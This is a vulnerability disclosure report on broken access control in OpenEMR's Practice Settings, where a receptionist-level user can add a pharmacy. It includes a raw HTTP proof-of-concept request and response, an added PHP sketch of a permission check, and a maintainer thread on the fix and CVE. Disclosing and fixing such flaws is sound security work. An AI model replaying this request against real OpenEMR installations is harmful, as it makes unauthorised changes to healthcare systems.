Broken Access Controls in Practice settings in openemr/openemr

Valid

Reported on

Dec 26th 2022


Description

We observed that a receptionist user can add a Pharmacy in the Practice Settings section, although this area is restricted to receptionist users.

Proof of Concept

REQUEST:

POST /openemr/controller.php?practice_settings&pharmacy&action=edit HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=<receptionist user's cookie>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/controller.php?practice_settings&pharmacy&action=edit

form_id=&name=test_pharmarcy&address_line1=11&address_line2=11&city=&state=&zip=&email=&phone=&fax=&npi=&ncpdp=&transmit_method=1&id=&process=true

RESPONSE:

HTTP/1.1 302 Found
Server: nginx/1.21.1
Date: Mon, 26 Dec 2022 09:02:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /openemr/controller.php?practice_settings&pharmacy&action=list
Content-Length: 9246

<!DOCTYPE html>
<html>
<head>
    <title>Practice Settings</title>

    
<meta charset="utf-8" />
...

PoC Image

After we send the request above, there is a new pharmacy added.

Impact

This vulnerability allows a front desk user to add any pharmacy, which could break the logic of the application.
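
A model of the failure this report describes, as an added example (not OpenEMR's code and not the fix commit): a small dispatcher that parses the `controller.php?practice_settings&pharmacy&action=edit` style query string and runs the pharmacy handler with and without a deny-by-default permission check. The role names, permission strings and function names are assumptions made for illustration.

```php
<?php
// Hypothetical role -> permission map; OpenEMR's real ACL data is not reproduced here.
const ROLE_PERMISSIONS = [
    'administrator' => ['admin/practice'],
    'receptionist'  => ['patients/appt'],
];
// Permission each controller requires; a controller missing from this map is denied.
const REQUIRED_PERMISSION = ['practice_settings' => 'admin/practice'];

/** Split "practice_settings&pharmacy&action=edit" into controller, sub-controller, action. */
function parseRoute(string $query): array
{
    $bare = [];
    $action = 'default';
    foreach (array_filter(explode('&', $query), 'strlen') as $part) {
        $pair = explode('=', $part, 2);
        if (count($pair) === 1) {
            $bare[] = urldecode($pair[0]);          // bare key: controller or sub-controller
        } elseif (urldecode($pair[0]) === 'action') {
            $action = urldecode($pair[1]);
        }
    }
    return [$bare[0] ?? '', $bare[1] ?? '', $action];
}

/** Dispatch a POST; $enforce = false models a handler that relies on the menu being hidden. */
function dispatch(string $role, string $query, array $post, array &$pharmacies, bool $enforce): int
{
    [$controller, $sub, $action] = parseRoute($query);
    $needed = REQUIRED_PERMISSION[$controller] ?? null;   // null: unknown controller, never granted
    if ($enforce && !in_array($needed, ROLE_PERMISSIONS[$role] ?? [], true)) {
        return 403;                                 // refused before any state changes
    }
    if ($controller === 'practice_settings' && $sub === 'pharmacy' && $action === 'edit'
        && ($post['process'] ?? '') === 'true') {
        $pharmacies[] = $post['name'] ?? '';
        return 302;                                 // redirect to action=list, as in the PoC response
    }
    return 200;
}

// Constructed sample based on the PoC request's query string and form fields.
$query = 'practice_settings&pharmacy&action=edit';
$post  = ['name' => 'test_pharmarcy', 'process' => 'true'];
foreach ([false, true] as $enforce) {
    $pharmacies = [];
    $status = dispatch('receptionist', $query, $post, $pharmacies, $enforce);
    printf("enforce=%s status=%d pharmacies=%d\n", var_export($enforce, true), $status, count($pharmacies));
}
```

The check sits in the dispatcher, ahead of the handler, so a request that skips the UI is still evaluated against the session's role.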

We are processing your report and will contact the openemr team within 24 hours. 5 months ago
We have contacted a member of the openemr team and are waiting to hear back 5 months ago
openemr/openemr maintainer has acknowledged this report 5 months ago
Brady Miller validated this vulnerability 4 months ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller
4 months ago

Maintainer


This is fixed in master branch at https://github.com/openemr/openemr/commit/bb4244c83a74628faafabc0598366f49863914a9

@Nhien.IT, @admin, I am unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 in about 3-4 weeks, which will include this fix. At that time (after release of OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a CVE).

Thanks for the report, @Nhien.IT!

Nhien.IT
4 months ago

Researcher


Hi @maintainer,

Thanks for your effort, I hope to publish a fix version soon.

Regards.

Nhien.IT
14 days ago

Researcher


Hi @maintainer,

I have received mail about 7.0.1 version being published. Any update here?

Brady Miller marked this as fixed in 7.0.1 with commit bb4244 14 days ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Brady Miller published this vulnerability 14 days ago